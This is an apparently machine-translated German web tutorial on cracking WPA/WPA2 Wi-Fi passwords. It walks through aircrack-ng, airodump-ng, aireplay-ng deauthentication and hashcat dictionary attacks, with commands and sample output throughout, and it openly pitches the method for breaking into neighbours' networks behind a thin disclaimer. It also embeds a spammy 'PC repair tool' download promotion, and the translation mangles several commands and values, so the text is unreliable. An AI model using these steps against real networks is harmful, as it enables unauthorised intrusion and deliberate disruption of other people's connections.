So knacken Sie WPAWPA2-WLAN-Passwörter über Hashcat u0026 amp; Aircrack-ng
Aktualisiert Marsch 2023: Erhalten Sie keine Fehlermeldungen mehr und verlangsamen Sie Ihr System mit unserem Optimierungstool. Holen Sie es sich jetzt unter - > diesem Link
- Downloaden und installieren Sie das Reparaturtool hier.
- Lassen Sie Ihren Computer scannen.
- Das Tool wird dann deinen Computer reparieren.
In diesem Handbuch werden wir Ihnen helfen, wie Sie WiFi-Netzwerke mit zwei der besten drahtlosen Hacking-Tools knacken können, die mit einem schwachen Passwort geschützt sind. Wir werden Schritt für Schritt detailliert beschreiben, wie Sie WPA2 mit aircrack-ng und hashcat hacken können, obwohl dies nicht erschöpfend ist. Dies sind genug Informationen, damit die Benutzer ihre Netzwerksicherheit testen oder in eine nahegelegene eindringen können.
Der unten beschriebene Angriff ist vollständig passiv und kann nicht erkannt werden, vorausgesetzt, das Kennwort lautet wurde geknackt, wird von Ihnen nicht verwendet. Um den Aufklärungsprozess zu beschleunigen, kann ein optionaler De-Authentifizierungs-Angriff verwendet werden. Außerdem können Sie bis zum Ende des Handbuchs mehr darüber erfahren.
Wenn Sie irgendwie ein wenig Know-how in Bezug auf diesen Prozess haben, dann Sie Sie müssen die Beschreibungen nicht kennen. Springen Sie einfach zur Liste der Befehle, die unten verwendet wurden.
Wichtige Hinweise:
Mit diesem Tool können Sie PC-Problemen vorbeugen und sich beispielsweise vor Dateiverlust und Malware schützen. Außerdem ist es eine großartige Möglichkeit, Ihren Computer für maximale Leistung zu optimieren. Das Programm behebt häufige Fehler, die auf Windows-Systemen auftreten können, mit Leichtigkeit - Sie brauchen keine stundenlange Fehlersuche, wenn Sie die perfekte Lösung zur Hand haben:
- Schritt 1: Laden Sie das PC Repair & Optimizer Tool herunter (Windows 11, 10, 8, 7, XP, Vista - Microsoft Gold-zertifiziert).
- Schritt 2: Klicken Sie auf "Scan starten", um Probleme in der Windows-Registrierung zu finden, die zu PC-Problemen führen könnten.
- Schritt 3: Klicken Sie auf "Alles reparieren", um alle Probleme zu beheben.
Hinweis: Denken Sie daran, dass dieses Tutorial nur ist zu Bildungszwecken und sollte nicht für illegale Aktivitäten verwendet werden. Der Autor ist für keinerlei Verwendung verantwortlich.
Die benötigten Tools
- Stellen Sie sicher, dass Sie mit der Linux-Befehlszeile vertraut sind.
- Stellen Sie sicher, dass entweder Kali Linux oder Kali NetHunter installiert ist.
- Stellen Sie nun sicher, dass Aircrack-ng heruntergeladen und installiert ist.
- Das letzte Tool, das Sie benötigen, ist Hashcat.
- John The Ripper ist eine großartige Alternative, wenn Hashcat nicht mehr für Sie funktioniert.
So knacken Sie WPA2-Passwörter mit Aircrack-ng a nd Hashcat (Tutorial)
Aktivieren Sie den Überwachungsmodus in Ihrem WLAN-Adapter.
Sie müssen zunächst die drahtlosen Interaktionen auflisten, die den Überwachungsmodus unterstützen mit:
Airmon-ng
Wenn keine Schnittstelle aufgeführt ist, dann Dies bedeutet, dass Ihre WLAN-Karte den Überwachungsmodus nicht unterstützt. Wir können davon ausgehen, dass der Name der drahtlosen Schnittstelle [E-Mail-geschützt] ist. Stellen Sie sicher, dass Sie den richtigen Namen verwenden, wenn er davon abweicht. Dann versetzen wir die Schnittstelle in den Überwachungsmodus:
Airmon-ng start [email protected]
Danach müssen Sie iwconfig ausführen. Sie können nun einen neuen Überwachungsmodus sehen, der wie m [E-Mail geschützt] oder [E-Mail geschützt] aufgeführt ist.
Suchen Sie Ihren Ziel
Sie müssen über Ihre Monitorschnittstelle mit dem Abhören der 802.11 Beacon-Frames beginnen, die von den WLAN-Routern in der Nähe gesendet werden:
Airodump-ng [E-Mail geschützt]
Die folgende Ausgabe wird angezeigt:
CH 13] [Verstrichen: 52 s] [2021–03–07 16:50
BSSID PWR-Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
14:91:82 : F7: 52: EB-66 205 26 0 1 54e OPN belkin.2e8.guests
14: 91: 82: F7: 52: E8-64 212 56 0 1 54e WPA2 CCMP PSK belkin.2e8
14: 22: DB: 1A: DB: 64-81 44 7 0 1 54 WPA2 CCMP \u0026 lt; Länge: 0 \u0026 gt;
14: 22: DB: 1A: DB: 66-83 48 0 0 1 54e. WPA2 CCMP PSK gesichert Sie
9C: 5C: 8E: C9: AB: C0-81 19 0 0 3 54e WPA2 CCMP PSK gesichert Sie
00: 23: 69: AD: AF: 94-82 350 4 0 1 54e WPA2 CCMP PSK SecuredYou ist der beste
06: 26: BB: 75 : ED: 69-84 232 0 0 1 54e. WPA2 CCMP PSK HH2
78: 71: 9C: 99: 67: D0-82 339 0 0 1 54e. WPA2 CCMP PSK ARRIS-67D2
9C: 34: 26: 9F: 2E: E8-85 40 0 0 1 54e. WPA2 CCMP PSK Comcast_2EEA-EXT
BC: EE: 7B: 8F: 48: 28-85 119 10 0 1 54e WPA2 CCMP PSK root
EC: 1A: 59: 36: AD: CA-86 210 28 0 1 54e WPA2 CCMP PSK belkin.dca
Jetzt werden wir das Passwort von knacken ein Netzwerk mit dem Namen gesichert. Sie müssen sich die BSSID-MAC-Adresse sowie die Kanalnummer (CH) merken, wie sie von Airodump-ng angezeigt wird, da wir beide für den nächsten Schritt benötigen.
So erfassen Sie a 4-Wege-Handshake in WiFi-Netzwerken
Der WPA oder WPA2 verwendet einen 4-Wege-Handshake, um Geräte im Netzwerk zu authentifizieren. Sie müssen nicht wissen, was es bedeutet, aber Sie müssen einen dieser Handshakes erfassen, um das Netzwerkkennwort zu knacken. Handshakes finden statt, wenn ein Gerät eine Verbindung zum Netzwerk herstellt, z. B. wenn Ihre Nachbarn nach Hause kommen. Wir können diesen Handshake erfassen, indem wir airmon-ng anweisen, den Verkehr auf dem Ziel mithilfe des Kanals sowie der bssid-Werte zu überwachen, die vom letzten Befehl stammen.
- Ersetzen Sie die Werte-c und-bssid durch die Werte Ihres Zielnetzwerks
- -w gibt das Verzeichnis an, in dem die Paketerfassung gespeichert werden soll.
- airodump-ng-c 3-bssid 9C: 5C: 8E: C9: AB: C0-w. mon0
- CH 6] [Verstrichen: 1 Minute] [2020–03–7 13:09:16]
- BSSID PWR RXQ-Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
- 9C: 5C: 8E: C9: AB: C0-47 0 140 0 0 6 54e WPA2 CCMP PSK DELL
Sobald Sie den Handschlag erfasst haben Sie müssen etwas wie {WPA-Handshake: bc: d3: c9: ef: d2: 67 sehen. Dort oben rechts auf dem Bildschirm befindet sich genau rechts von der aktuellen Uhrzeit.
Wenn Sie sich ungeduldig fühlen und sich wohl fühlen Wenn Sie den aktiven Angriff verwenden, können Sie die Geräte zwingen, eine Verbindung zum Zielnetzwerk herzustellen, um die Verbindung wiederherzustellen, indem Sie böswillige De-Authentifizierungspakete an sie senden. Dies führt zur Erfassung eines 4-Wege-Handshakes.
Nachdem der Handshake erfasst wurde, müssen Sie Strg-C drücken, um Airodump-ng zu beenden. Sie sehen eine .cap-Datei, in der Sie airodump-ng angewiesen haben, die Aufnahme mit dem Namen-01.Cap zu speichern. Wir werden diese Erfassungsdatei verwenden, um das Netzwerkkennwort zu knacken. Wir werden diese Datei umbenennen, um den Netzwerknamen wiederzugeben, den wir knacken möchten:
Mv ./-01.cap gesichert .cap
Der wahre Spaß: Knacken des WPA2-Pins
Im letzten Schritt wird das Passwort mithilfe von geknackt der gefangene Händedruck. Wenn Sie Zugriff auf eine GPU haben, wird dringend empfohlen, den Hashcat zum Knacken von Passwörtern zu verwenden. Wir haben ein Tool entwickelt, mit dem der Hashcat sehr einfach zu bedienen ist, das als naiver Hashcat bezeichnet wird.
Wenn Sie keinen Zugriff auf die GPU haben, finden Sie viele GPU-Cracking-Dienste, die wie folgt verwendet werden können die GPUHASH.me oder OnlineHashCrack. Sie können auch CPU-Cracking mit dem Aircrack-ng verwenden. Wenn Sie jedoch Zeit sparen und den größten Teil Ihrer GPU verwenden möchten, sollten Sie Ihre GPU übertakten, um das Brute-Forcing zu beschleunigen.
Beachten Sie, dass beide der folgenden Methoden ein vom Benutzer generiertes Kennwort voraussetzen . Viele der WPA-oder WPA2-Router werden mit zufälligen 12-stelligen Kennwörtern geliefert, die die meisten Benutzer unverändert lassen. Wir empfehlen Ihnen, die WPA-Wörterbuchdateien der wahrscheinlichen Wortlisten zu verwenden, wenn Sie eines dieser Kennwörter knacken möchten.
Verwenden von Naive-Hashcat, um die Magie auszuführen
Bevor Sie das Kennwort mit dem naiven Hashcat knacken, müssen Sie die .cap-Datei in das entsprechende Hashcat-Dateiformat .hccapx konvertieren. Dies kann sehr schnell erfolgen, indem Sie entweder die .cap-Datei auf https://hashcat.net/cap2hccapx hochladen oder direkt das cap2hccapx-Tool verwenden.
Anschließend müssen Sie sie herunterladen und in Hashcat ausführen:
# downloadgit-Klon https://github.com/brannondorsey/naive-hashcat
cd naive-hashcat
Laden Sie eine Wortliste oder eine große Wörterbuchdatei herunter:
Kennwörter Wortliste zum Knacken von WPA2-WLAN-Kennwörtern
Hashcat-Modus für WPA/WPA2, den Sie festlegen müssen:
2500 ist der Hashcat-Hash-Modus für WPA/WPA2
HASH_FILE = Secureyou.hccapx .sh
Der naive Hashcat verwendet verschiedene Angriffe wie Regel, Kombination, Maske und Wörterbuch und es kann fast 10 Tage dauern, bis die Kennwörter mittlerer Stärke ausgeführt werden. Das geknackte Passwort wird in hackme.pot gespeichert, daher müssen Sie diese Datei regelmäßig überprüfen. Sobald das Passwort geknackt wurde, wird Folgendes als Inhalt Ihrer POT_FILE angezeigt:
e30a5a57fc00211fc9f57a4491508cc3: 9c5c8ec9abc0: acd1b8dfd971: ASUS: Secureyouhacking
Die letzten beiden Dateien, die durch Folgendes getrennt wurden: sind der Name des Netzwerks bzw. das Kennwort.
Verwenden von Aircrack-ng zum Ausführen eines Wörterbuchangriffs
Das Aircrack-ng kann auch für grundlegende Wörterbuchangriffe verwendet werden, die auf Ihrer CPU ausgeführt werden. Bevor Sie die Straftat ausführen können, benötigen Sie eine Wortliste. Wir empfehlen Ihnen, die berüchtigte Rockyou-Wörterbuchdatei zu verwenden.
RockYou-Wörterbuch-Wortlistendatei herunterladen
Beachten Sie, dass das Netzwerkkennwort nicht lautet In der Wortliste dürfen Sie das Kennwort nicht knacken.
- #-a2 gibt WPA2 an,-b ist die BSSID,-w ist die Wortdatei
- aircrack-ng-a2-b 9C: 5C: 8E: C9: AB: C0-w rockyou.txt hackme.cap
Das sollst du Eine KEY FOUND-Nachricht im Terminal wird angezeigt, auf die eine Klartextversion des Netzwerkkennworts folgt, wenn das Kennwort geknackt ist.
- Aircrack-ng 2.0
- [00:01:49] 111040 getestete Schlüssel (102,73 k/s)
- SCHLÜSSEL GEFUNDEN! [SecuredYou-Test-Umgebung]
- Hauptschlüssel: A1 90 16 62 6C B3 E2 DB BB D1 79 CB 75 D2 C7 89
- 59 4A C9 04 67 10 66 C5 97 83 7B C3 DA 6C 29 2E
- Übergangsschlüssel: CB 5A F8 CE 62 B2 1B F7 6F 50 C0 25 62 E9 5D 71
- 2F 1A 26 34 DD 9F 61 F7 68 85 CC BC 0F 88 88 73
- 6F CB 3F CC 06 0C 06 08 ED DF EC 3C D3 42 5D 78
- 8D EC 0C EA D2 BC 8A E2 D7 D3 A2 7F 9F 1A D3 21
- EAPOL HMAC: 9F C6 51 57 D3 FA 99 11 9D 17 12 BA B6 DB 06 B4
Durchführen der De-authentication Attack
Der De-Authentication-Angriff kann gefälschte De-Authentication-Pakete von Ihrem Computer an den Client senden, der mit dem Netzwerk verbunden ist, das Sie knacken möchten. Die Pakete enthalten gefälschte Absenderadressen, die dem Client so erscheinen, als ob sie vom Zugriffspunkt selbst gesendet wurden. Beim Empfang von Paketen wie diesen trennen sich wahrscheinlich viele Clients vom Netzwerk und stellen die Verbindung sofort wieder her, wenn Sie mit airodump-ng hören.
Sie können airodump-ng zur Überwachung verwenden einen bestimmten Zugriffspunkt (unter Verwendung von –c channel –bssid MAC), es sei denn und bis Sie sehen, dass ein Client (STATION) verbunden ist. Ein verbundener Client sieht fast so aus, wobei 64: BC: 0C: 48: 97: F7 der Client-MAC ist.
- CH 7] [Abgelaufen: 4 Minuten] [2020–03-08 20:24]
- BSSID PWR RXQ-Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
- 9C: 5C: 8E: C9: AB: C0-19 75 1043 144 10 6 54e WPA2 CCMP PSK ASUS
- BSSID STATION PWR Rate verlorene Frames Prob
- 9C: 5C: 8E: C9: AB: C0 64: BC: 0C: 48: 97: F7-37 1e-1e 4 6479 Dell
Jetzt müssen Sie airodump-ng laufen lassen und Öffnen Sie ein neues Terminal. Wir werden einen airplay-ng-Befehl verwenden, um gefälschte De-Auth-Pakete an den Client des Opfers zu senden, wodurch dieser gezwungen wird, sich wieder mit dem Netzwerk zu verbinden und dabei hoffentlich einen Handschlag zu erhalten.
- -0 3 gibt an, dass 3 Deauth-Pakete gesendet werden sollen. Erhöhen Sie diese Anzahl
- , wenn das Risiko besteht, dass die Client-Netzwerkaktivität merklich unterbrochen wird.
- -a ist der MAC des Zugriffspunkts
- -c ist der MAC des Clients
- aireplay-ng-0 2-a 9C: 5C: 8E: C9: AB: X0-c 64: DC: 3C: 48: 97: F7 mon0
Mit dem folgenden Befehl können Sie auch Deauth-Pakete an alle verbundenen Clients in einem drahtlosen Netzwerk senden:
- aireplay-ng-0 2-a 9C: 5C: 8E: C9: AB: C0 mon0
Sobald Sie die Deauth-Pakete senden Sie müssen zum Airodumping-Prozess zurückkehren, und wenn Sie Glück haben, können Sie dort oben rechts so etwas sehen [WPA-Handshake: 9C: 6C: 9E: D7: 8G: C0. Nachdem der Handshake erfasst wurde, können Sie das Netzwerkkennwort knacken.
Videoversion des Tutorials
Wenn Sie jemand sind, der lernt Wenn Sie jemand anderem dabei zuschauen, finden Sie unten eine Videoversion für Sie.
Hacken von WPA2-Funkkennwörtern mit Aircrack-ng/Hashcat
Alternative drahtlose Hacking-Tools, die Sie verwenden können:
- Kismet kostenloser Download-WiFi Sniffer
- Reaver WPS Pin Cracker Download
- 15 Beste kostenlose Hacking-Tools und Sicherheitstools zum Herunterladen.
Letzte Wörter
Haftungsausschluss: Dies ist nur eine Simulation, wie jemand WPA2-Passwörter mit Tools wie Hashcat und Aircrack-ng knacken kann. Diese Art von Aktivität sollte nur in einer kontrollierten Umgebung durchgeführt werden, in der die Erlaubnis erteilt wurde. Ich hoffe jedoch, dass Ihnen dieses umfassende Tutorial gefallen hat und Sie das Beste daraus gemacht haben.